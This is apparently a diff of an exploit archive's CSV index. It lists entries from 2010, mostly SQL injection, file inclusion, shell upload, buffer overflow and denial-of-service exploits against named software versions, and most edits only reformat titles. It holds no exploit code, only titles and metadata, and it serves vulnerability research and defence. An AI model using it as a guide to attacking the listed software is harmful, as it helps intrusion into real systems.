-11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 -11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 (Auth Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 +11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 - (Auth Bypass) SQL Injection",2010-03-30,indoushka,php,webapps,0 +11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 - (Auth Bypass) SQL Injection",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information",2010-03-30,indoushka,php,webapps,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 @@ -10979,7 +10979,7 @@ id,file,description,date,author,platform,type,port 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 -12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 +12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf - (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0 12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) bof PoC",2010-04-03,d3b4g,windows,dos,0 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 @@ -11023,7 +11023,7 @@ id,file,description,date,author,platform,type,port 12073,platforms/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - (.mp3) Local DoS",2010-04-05,anonymous,windows,dos,0 12074,platforms/windows/dos/12074.pl,"Portable AVS DVD Authoring 1.3.3.51 - Local Crash PoC",2010-04-05,R3d-D3V!L,windows,dos,0 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - (index.php) Shell Upload",2010-04-05,ayastar,php,webapps,0 -12076,platforms/php/webapps/12076.pl,"ilchClan <= 1.0.5 (cid) SQL Injection & Exploit",2010-04-05,"Easy Laster",php,webapps,0 +12076,platforms/php/webapps/12076.pl,"ilchClan <= 1.0.5 - (cid) SQL Injection & Exploit",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,indoushka,windows,dos,0 @@ -11179,7 +11179,7 @@ id,file,description,date,author,platform,type,port 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 -20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,metasploit,windows,local,0 +20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow",2012-07-27,Metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - (id) SQL Injection",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 @@ -11224,7 +11224,7 @@ id,file,description,date,author,platform,type,port 12290,platforms/php/webapps/12290.txt,"Joomla Component Contact Us Google Map com_google Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12291,platforms/php/webapps/12291.txt,"Joomla Component iF surfALERT com_if_surfalert Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload",2010-04-19,Mr.MLL,php,webapps,0 -12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 +12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (RFI/LFI) Multiple File Include",2010-04-19,"cr4wl3r ",php,webapps,0 @@ -11264,11 +11264,11 @@ id,file,description,date,author,platform,type,port 12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 - Win32k.sys SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12338,platforms/php/webapps/12338.txt,"Cacti <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy -",2010-04-22,_SuBz3r0_,php,webapps,0 -12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)",2010-04-22,LiquidWorm,windows,dos,0 +12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy",2010-04-22,_SuBz3r0_,php,webapps,0 +12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote DoS Exploit (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow PoC",2010-04-22,LiquidWorm,windows,local,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 -12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 (7D11) Model MB702LL Mobile Safari Denial-of-Service",2010-04-19,"Matthew Bergin",hardware,dos,0 +12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial-of-Service",2010-04-19,"Matthew Bergin",hardware,dos,0 12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - XSS Vulnerabilities",2010-04-22,Valentin,php,webapps,0 12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - (id) Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0 @@ -11280,7 +11280,7 @@ id,file,description,date,author,platform,type,port 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password & Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0 -12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 (tempid) Remote SQL Injection",2010-04-23,v3n0m,php,webapps,0 +12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) Remote SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Include",2010-04-24,"cr4wl3r ",php,webapps,0 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (RFI/LFI) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 @@ -11290,7 +11290,7 @@ id,file,description,date,author,platform,type,port 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - (basedir) RFI/LFI",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - XSS and Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 -12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 +12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - XSS Vulnerabilities",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - XSS",2010-04-24,Valentin,php,webapps,0 12375,platforms/osx/dos/12375.c,"MacOS X 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 @@ -11317,7 +11317,7 @@ id,file,description,date,author,platform,type,port 12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 12406,platforms/windows/local/12406.py,"Avast! 4.7 - aavmker4.sys Privilege Escalation",2010-04-27,ryujin,windows,local,0 12407,platforms/php/webapps/12407.txt,"CMScout 2.08 SQL Injection",2010-04-26,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 +12408,platforms/windows/dos/12408.pl,"Safari 4.0.5 - (531.22.7) Denial of Service",2010-04-26,"Xss mAn",windows,dos,0 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 @@ -11364,7 +11364,7 @@ id,file,description,date,author,platform,type,port 12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload",2010-04-29,indoushka,php,webapps,0 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (XSS)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0 -12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 +12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection",2010-04-30,v3n0m,php,webapps,0 @@ -11387,7 +11387,7 @@ id,file,description,date,author,platform,type,port 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Auth Bypass",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 -12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 +12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload",2010-05-02,indoushka,php,webapps,0 @@ -11421,7 +11421,7 @@ id,file,description,date,author,platform,type,port 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 - LFI",2010-05-06,Batch,php,webapps,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0 12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 -12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 +12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - LFI",2010-05-06,"ALTBTA ",php,webapps,0 12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS SQL Injection",2010-05-06,MasterGipy,php,webapps,0 12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution Exploit",2010-05-06,"JosS and eidelweiss",php,webapps,0 @@ -11430,7 +11430,7 @@ id,file,description,date,author,platform,type,port 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) SQL Injection",2010-05-07,Ra3cH,asp,webapps,0 12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 -12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 +12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 - (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 12531,platforms/windows/dos/12531.pl,"GeoHttpServer Remote DoS",2010-05-08,aviho1,windows,dos,0 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection",2010-05-08,v3n0m,php,webapps,0 @@ -11473,7 +11473,7 @@ id,file,description,date,author,platform,type,port 12575,platforms/php/webapps/12575.txt,"Marinet CMS SQL Injection",2010-05-11,XroGuE,php,webapps,0 12576,platforms/php/webapps/12576.txt,"Woodall Creative SQL Injection",2010-05-11,XroGuE,php,webapps,0 12577,platforms/php/webapps/12577.txt,"Marinet CMS SQL/XSS/HTML Injection",2010-05-11,CoBRa_21,php,webapps,0 -12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 +12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI",2010-05-12,"Chip d3 bi0s",php,webapps,0 12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 @@ -11550,7 +11550,7 @@ id,file,description,date,author,platform,type,port 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart (article.php) SQL Injection",2010-05-19,v3n0m,php,webapps,0 12662,platforms/windows/local/12662.rb,"SyncBack Freeware 3.2.20.0",2010-05-19,Lincoln,windows,local,0 -12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 (ANSMTP.dll/AOSMTP.dll) ActiveX",2010-05-19,Lincoln,windows,remote,0 +12663,platforms/windows/remote/12663.html,"CommuniCrypt Mail 1.16 - (ANSMTP.dll/AOSMTP.dll) ActiveX",2010-05-19,Lincoln,windows,remote,0 12664,platforms/asp/webapps/12664.txt,"Renista CMS BUG",2010-05-20,"Amir Afghanian",asp,webapps,0 12665,platforms/php/webapps/12665.pl,"IMEDIA - (index.php) SQL Injection",2010-05-20,kannibal615,php,webapps,0 12666,platforms/php/webapps/12666.txt,"DB[CMS] - (article.php) SQL Injection",2010-05-20,blackraptor,php,webapps,0 @@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection",2010-05-25,MN9,php,webapps,0 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0Day)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 -12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 +12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 12744,platforms/php/webapps/12744.txt,"Webit CMS SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall (pages.php) SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 @@ -11650,14 +11650,14 @@ id,file,description,date,author,platform,type,port 12771,platforms/php/webapps/12771.txt,"Toronja CMS HTML/XSS Injection",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 +12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 - (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - (.avi) Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 12780,platforms/php/webapps/12780.txt,"Joomla Component BF Quiz SQL Injection",2010-05-28,Valentin,php,webapps,0 12781,platforms/php/webapps/12781.txt,"Joomla Component com_jepoll (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12782,platforms/php/webapps/12782.txt,"Joomla Component com_jejob 1.0 (catid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 +12782,platforms/php/webapps/12782.txt,"Joomla Component com_jejob 1.0 - (catid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - Remote SQL Injection",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - RFI / SQLi",2010-05-29,AntiSecurity,php,webapps,0 @@ -11705,7 +11705,7 @@ id,file,description,date,author,platform,type,port 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI",2010-06-03,Sid3^effects,php,webapps,0 -12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 +12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall",2010-06-03,indoushka,php,webapps,0 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 @@ -12258,11 +12258,11 @@ id,file,description,date,author,platform,type,port 13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij <= 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 -13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 +13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - (.mp4) Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13920,platforms/windows/dos/13920.c,"H264WebCam Boundary Condition Error",2010-06-18,"fl0 fl0w",windows,dos,0 -13921,platforms/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 +13921,platforms/windows/dos/13921.c,"PowerZip 7.21 - (Build 4010) Stack Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 13922,platforms/php/webapps/13922.txt,"Joomla Component com_joomdocs XSS",2010-06-18,Sid3^effects,php,webapps,0 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13925,platforms/php/webapps/13925.txt,"joomla component ozio gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 @@ -12315,7 +12315,7 @@ id,file,description,date,author,platform,type,port 13976,platforms/php/webapps/13976.txt,"Top Sites Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13977,platforms/php/webapps/13977.txt,"Social Community Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 (catid) SQL Injection",2010-06-22,v3n0m,php,webapps,0 +13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 - (catid) SQL Injection",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS SQL Injection (e4700.asp?id)",2010-06-22,CoBRa_21,php,webapps,0 @@ -12357,7 +12357,7 @@ id,file,description,date,author,platform,type,port 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 -14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 +14030,platforms/asp/webapps/14030.pl,"phportal_1.2 - (gunaysoft.php) Remote File Include",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI",2010-06-24,"Zer0 Thunder",php,webapps,0 14035,platforms/php/webapps/14035.txt,"Big Forum SQL Injection (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 @@ -12382,7 +12382,7 @@ id,file,description,date,author,platform,type,port 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component LFI",2010-06-26,Sid3^effects,php,webapps,0 14085,platforms/php/webapps/14085.txt,"iNet Online Community Blind SQLi",2010-06-28,JaMbA,php,webapps,0 14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 -14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection",2010-06-28,Dark.Man,php,webapps,0 +14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 - (buyupg.php) SQL Injection",2010-06-28,Dark.Man,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI",2010-06-26,Sid3^effects,php,webapps,0 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI",2010-06-26,Sid3^effects,php,webapps,0 @@ -12410,7 +12410,7 @@ id,file,description,date,author,platform,type,port 14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0Day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 -14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 +14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection",2010-06-29,v3n0m,php,webapps,0 14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS Remote SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 @@ -12427,14 +12427,14 @@ id,file,description,date,author,platform,type,port 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh shellcode (116 